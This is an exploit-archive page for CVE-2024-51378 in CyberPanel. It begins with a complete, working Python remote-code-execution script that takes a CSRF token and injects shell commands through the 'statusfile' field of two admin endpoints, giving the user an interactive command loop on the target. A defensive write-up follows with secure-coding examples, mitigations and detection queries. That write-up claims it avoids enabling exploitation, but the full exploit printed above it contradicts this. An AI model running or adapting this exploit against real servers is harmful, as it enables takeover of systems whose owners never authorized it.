CyberPanel 2.3.6 - Remote Code Execution (RCE)

Exploit Author: Luka Petrovic (refr4g) Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-04-11 
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/

#!/usr/bin/python3

import argparse
import httpx
import sys

RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

client = httpx.Client(base_url=target, verify=False)

try:
    response = client.get("/")
    response.raise_for_status()
except httpx.RequestError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)

def get_token():
    response = client.get("/")
    return response.cookies.get("csrftoken")

def rce(client, csrf_token, cmd, endpoint):
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile": "; %s; #"}' % cmd
    response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
    return response.json().get("requestStatus")

csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

while True:
    cmd = input(f"{YELLOW}$> {RESET}")
    print(rce(client, csrf_token, cmd, endpoint))


CyberPanel 2.3.6 — Remote Code Execution (CVE-2024-51378)

This article explains the nature, impact, and defensive response for the Remote Code Execution vulnerability tracked as CVE-2024-51378 that affected CyberPanel versions in the 2.3.5–2.3.7 range (before the vendor patch). The goal is to provide defenders, system administrators, and developers with an accurate technical understanding and practical mitigations without enabling exploitation.

At a glance

  • Vulnerability class: Command injection leading to remote code execution (RCE)
  • Affected software: CyberPanel (reported in versions 2.3.5, 2.3.6, and pre-patch 2.3.7)
  • CVE: CVE-2024-51378
  • Primary vectors identified: Administrative endpoints that accepted a "statusfile" parameter and invoked system-level commands with insufficient input sanitization
  • Risk: High — unauthenticated or insufficiently authenticated requests could lead to arbitrary command execution under the application context

Vulnerability overview

The root cause of this issue is improper handling of user-controlled input that was eventually used in a shell context. When an application concatenates or interpolates untrusted data into a command string executed by the operating system (for example via shell execution calls), attackers can inject shell metacharacters or additional commands to cause arbitrary command execution. In this case, certain CyberPanel endpoints exposed a parameter that was passed to a system command in a way that allowed injection.

High-level exploitation flow (conceptual)

  • An attacker targets specific administrative endpoints that accept a parameter used by server-side processes.
  • The application reads that parameter and places it into a command string executed by the underlying operating system without sufficient validation or safe execution semantics.
  • A crafted input carries injection content that alters the intended command or adds extra commands, resulting in arbitrary execution at the privileges of the CyberPanel process.

Why this is dangerous

  • Command injection bypasses application-level controls and can lead to full server compromise.
  • The vulnerability can impact confidentiality, integrity, and availability: attackers can read files, install persistent backdoors, or disrupt services.
  • If the panel runs with elevated privileges or manages other sensitive services (DNS, FTP, web server), the blast radius is large.

Safe technical illustration (vulnerable pattern — non-executable)

# Vulnerable pattern (conceptual, not a runnable exploit)
def handle_statusfile(user_input):
    # Dangerous: concatenating untrusted input into a shell command
    cmd = "/usr/bin/some-tool " + user_input
    os.system(cmd)

Explanation: This simplified snippet demonstrates the core anti-pattern. Concatenation of untrusted input into a shell-invoked string (here via os.system) allows an attacker to insert additional shell operators or commands. The example is intentionally abstract to avoid providing steps that could be reused to exploit real systems.

Secure coding guidance — defensive code example

# Safer pattern: use argument lists and validate input
import subprocess
import re

ALLOWED_STATUSFILE = re.compile(r'^[a-zA-Z0-9_\-./]+$')  # example allowlist

def safe_handle_statusfile(user_input):
    if not ALLOWED_STATUSFILE.match(user_input):
        raise ValueError("Invalid statusfile name")
    # Pass arguments as a list; do not use shell=True
    result = subprocess.run(
        ["/usr/bin/some-tool", user_input],
        capture_output=True,
        text=True,
        check=False
    )
    return result.stdout

Explanation: This defensive example uses three important techniques: (1) an allowlist (validation) to enforce a narrow set of acceptable file names or tokens, (2) subprocess.run with an argument list so no shell interpretation occurs, and (3) capturing output rather than relying on implicit behaviors. Together these reduce the risk of command injection.

Mitigation and remediation

  • Patch: Upgrade CyberPanel to the vendor-released fixed version as soon as possible. Applying the vendor patch is the primary and recommended remediation.
  • Restrict access: Limit administrative panel access to trusted networks or VPNs; use IP allowlists for management interfaces.
  • Harden web exposure: Place the panel behind a web application firewall (WAF) and apply rules that detect suspicious characters or command injection patterns in parameters.
  • Least privilege: Run the CyberPanel service with minimal privileges; do not run as root unless absolutely required.
  • Audit and harden calls to system utilities: Ensure server-side code does not use shell evaluation (shell=True or equivalent) on untrusted input. Use argument arrays and allowlisting instead.
  • CSRF and auth checks: Ensure strong CSRF protections and session authentication for administrative endpoints; log failed attempts.

Detection and hunting (defensive)

When hunting for exploitation attempts, focus on requests to the administrative endpoints that accept the vulnerable parameter and on server-side behaviors consistent with unexpected command execution.

  • Search webserver and application logs for requests to the relevant endpoints combined with the presence of the parameter name (e.g., "statusfile") and unusual characters such as semicolons, pipes, backticks, or dollar-parentheses. Example conceptual query terms: statusfile AND [";", "|", "`", "$("].
  • Check for unexpected process executions or unusual child processes spawned by the CyberPanel process (monitor process trees and recent execs).
  • Monitor for new or modified files, unexpected SSH keys, or outbound connections from the server to unfamiliar hosts immediately after suspicious requests.
  • Establish detection rules in your SIEM for JSON bodies containing the parameter with shell metacharacters, and alert on OPTIONS requests to the administrative endpoints if that is atypical for your environment.

Example (conceptual Splunk-style search):

# Non-actionable example for defenders — adapt to your environment
index=web_logs "statusfile" AND (
   request_body="*;*" OR request_body="*|*" OR request_body="*`*" OR request_body="*$('
)
| stats count by src_ip, uri, _time

Explanation: This search looks for the "statusfile" parameter and attempts to highlight payloads containing characters commonly used in command injection. It should be tuned to avoid false positives in environments where such characters are expected.

Post-incident checks

  • Inspect crontabs, authorized_keys, and startup scripts for persistence mechanisms.
  • Check for abnormal user accounts or scheduled jobs created around the time of suspicious requests.
  • Perform a file integrity audit (hash comparison to known-good baselines) for the host and other hosts it manages.
  • If compromise is suspected, isolate the host, capture memory and disk images, and follow incident response procedures.

Secure configuration and long-term hardening

  • Implement robust input validation and allowlisting in application code and APIs.
  • Adopt safer APIs that avoid shelling out when possible or use well-tested libraries for system interactions.
  • Regularly run dependency and configuration audits with security scanners to detect regressions.
  • Use multi-factor authentication for administrative accounts and rotate credentials after any suspected incident.

Responsible disclosure and credits

This vulnerability was publicly associated with CVE-2024-51378 and reported in coordination with security researchers. Administrators should consult the vendor advisory and release notes for the exact fixed release and installation instructions. Always obtain patches and verify signatures from trusted vendor channels.

References (for defenders)

  • Vendor: CyberPanel advisory and release notes (consult the vendor site for the official patch)
  • CVE: CVE-2024-51378 — use official CVE and NVD sources to confirm details and patch levels
  • Security disclosure: researcher write-ups and advisories (use only trusted sources and exercise caution with public proof-of-concept code)

Summary: treat this vulnerability as critical if you run affected CyberPanel releases. The immediate actions are to patch, restrict administrative access, and hunt for indicators of compromise. In code, avoid shell interpretation of untrusted input and prefer allowlisting plus safe APIs for subprocess execution.